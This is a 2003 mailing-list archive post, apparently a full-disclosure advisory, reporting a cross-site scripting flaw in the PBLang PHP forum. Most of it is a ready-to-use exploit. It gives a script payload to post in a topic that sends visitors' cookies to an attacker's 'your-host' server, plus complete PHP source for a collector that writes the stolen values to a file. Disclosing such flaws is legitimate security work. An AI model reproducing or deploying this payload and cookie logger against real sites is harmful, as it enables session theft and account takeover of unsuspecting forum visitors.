PBLang Forum XSS Vul

From: Quan Van Truong Bui (quan_vu_208cnat_private)
Date: Fri Jul 25 2003 - 05:54:11 PDT

Next message: Angelidis, Fotis(NSASOUDABAY): "RE: Windows NT 4.0 with IBM JVM Denial of Service"

Previous message: Mandrake Linux Security Team: "MDKSA-2003:066-2 - Updated kernel packages fix multiple vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) PBLang is a web forum written by PHP language. A security vulnerability in the product allows posting of HTML code and JavaScript into existing web pages thus causing it to be executed on the client end (a Cross-Site Scripting vuln). |--------------------------------------------| Vulnerable systems: PBLang forum Version: 4.0 or lower Website: http://pblang.drmartinus.de/ Problem: Cross Site Scripting (XSS) |--------------------------------------------| If someone inserts <script>`anyscript`</script> instead of the post’s content, the JavaScript code is executed by Internet Explorer or some other web browsers. This allows stealing of cookie data and other interesting things… Exploit: Inserting a new topic (or reply) with the following script, it will send visitor's cookies to your host. The output is saved to http://your- host/cookie.txt *-------------------------------------------------------------------------- ------------------- <script>window.open("http://your-host/docs.php?docs="+escape (document.cookie), "subwindows", "height=100,width=486")</script> --------------------------------------------------------------------------- ------------------* Or insert every scripts – Java and HTML (ex: javascript:history.go(-1), window.write(‘Hello world’), javascript:alert(‘Hi!!!’)… ) * Code of docs.php:* *-------------------------------------------------docs.php----------------- ------------------------------- <?php //Copyright by W_Hat (www.pcworldvn.com) define ("LINE", "\r\n"); define ("HTML_LINE", "<br>"); function getvars($arr, $title) { $res = ""; $len = count($arr); if ($len>0) { if (strlen($title)>0) { print("[--------$title--------]" . HTML_LINE); $res .= "[--------$title--------]" . LINE; } foreach ($arr as $key => $value) { print("[$key]" . HTML_LINE); print($arr[$key] . HTML_LINE); $res .= "[$key]" . LINE . $arr[$key] . LINE; } } return $res; } // get current date $now = date("Y-m-d H:i:s"); // init $myData = "[-----$now-----]" . LINE; // get $myData .= getvars($HTTP_GET_VARS, ""); // file $file = $REMOTE_ADDR . "cookie.txt"; $mode = "r+"; if (!file_exists($file)) $mode = "w+"; $fp = fopen ($file, $mode); fseek($fp, 0, SEEK_END); fwrite($fp, $myData); fclose($fp); ?> -------------------------------------------------docs.php------------------ ------------------------------* Name: Quan Van Truong E-Mail: quan_vu_208cnat_private Occupation: Bug Hunter

Next message: Angelidis, Fotis(NSASOUDABAY): "RE: Windows NT 4.0 with IBM JVM Denial of Service"
Previous message: Mandrake Linux Security Team: "MDKSA-2003:066-2 - Updated kernel packages fix multiple vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jul 25 2003 - 10:35:58 PDT